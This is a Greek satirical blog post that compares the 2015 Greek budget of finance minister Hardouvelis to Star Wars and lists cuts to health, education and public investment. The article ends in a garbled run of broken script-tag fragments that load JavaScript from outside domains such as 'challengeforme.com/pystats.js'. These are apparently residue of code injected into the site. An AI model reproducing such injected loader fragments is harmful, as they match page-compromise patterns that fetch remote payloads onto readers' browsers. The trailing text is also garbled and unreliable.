Μετά από πολλά χρόνια, σε κάποιον άλλο προϋπολογισμό, σε έναν μακρινό γαλαξία…! Γεράσιμος Λιβιτσάνος

Ο Darth Vader και το φωτόσπαθο του Γκίκα

‘Ο τίτλος αποτελεί υβρίδιο από το «μότο» της ταινίας Star Wars και μία δήλωση του υπουργού Οικονομίας, Γκίκα Χαρδούβελη στην συζήτηση που γίνεται στην Βουλή για τον προϋπολογισμό.

Πληροφορήθηκα από το διαδίκτυο, ότι θα δούμε μια ακόμη συνέχεια του κινηματογραφικού έπους που δημιούργησε αρχικά ο George Lucas, μέσα στο 2015. Ελπίζω να μην είναι ψέμα.

Πληροφορήθηκα παρακολουθώντας την συζήτηση για τον προϋπολογισμό στην Βουλή, ότι θα δούμε μία ακόμη συνέχεια του μνημονιακού έπους που δημιούργησε αρχικά ο George Papandreou, μέσα στο 2015. Αυτό θα ήθελα να ήταν ψέμα.

Η δήλωση του Γκίκα Χαρδούβελη έχει ως εξής: «Άκουσα με πολύ ενδιαφέρον την κριτική (σ.σ της αντιπολίτευσης) για τις κοινωνικές παροχές και γενικά για τον Προϋπολογισμό. Αυτό κάποτε θα αλλάξει, όμως πρέπει πρώτα να σταθεί η οικονομία στα πόδια της».

Ο προϋπολογισμός που κατέθεσε στην Βουλή ο υπουργός Οικονομίας προβλέπει ένα πρωτογενές πλεόνασμα, 3%, το οποίο αμφισβητεί η Τρόϊκα. ‘Αρα δεν ισχύει το πρωτογενές πλεόνασμα. Είναι επίσης εμφανές ότι ο Γκίκας Χαρδούβελης τον έχει περιποιηθεί με το «φωτόσπαθό» του:

Μειώσεις 1,12 δις ευρώ στα υπουργεία: Υγείας, Παιδείας και Εργασίας.
Μείωση των δαπανών στα δημόσια νοσοκομεία κατά 22,9%. Από 1,45 δις στα 1.18 δις.
Μείωση των δημόσιων επενδύσεων κατά 400 εκατ. ευρώ σε σχέση με το 2014. Από 6,8 δις το 2014 γίνονται 6,4 εκατομμύρια το 2015.
Μείωση στις λειτουργικές δαπάνες περικόπτονται κατά 85 εκατομμύρια δηλαδή 7,3%
Μείωση στις δαπάνες μισθοδοσίας κατά 83 εκατομμύρια δηλαδή 5,4%,
Μείωση των επενδύσεων για άγονες γραμμές από 130 εκατομμύρια ευρώ σε 84 εκατομμύρια.

Α, ναι επίσης έχουμε:

Αύξηση των φόρων κατά 32 εκατομμύρια δηλάδή 7,2%
Αύξηση των εσόδων από αποκρατικοποιήσεις (δηλαδή ξεπουλήματα) κατά 5,4 δις.
Αύξηση του ταμειακού ελλείμματος στα ασφαλιστικά ταμεία από 807 εκατομμύρια το 2014 σε 1 δις 89 εκατομμύρια το 2015

May the Force be with us….

thePressProject___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>challengeforme.com/pystats.js’ async=true >challengeforme.com/pystats.js’ async=true >‘ >‘ >‘ >‘ >‘ >‘ >‘ >‘ >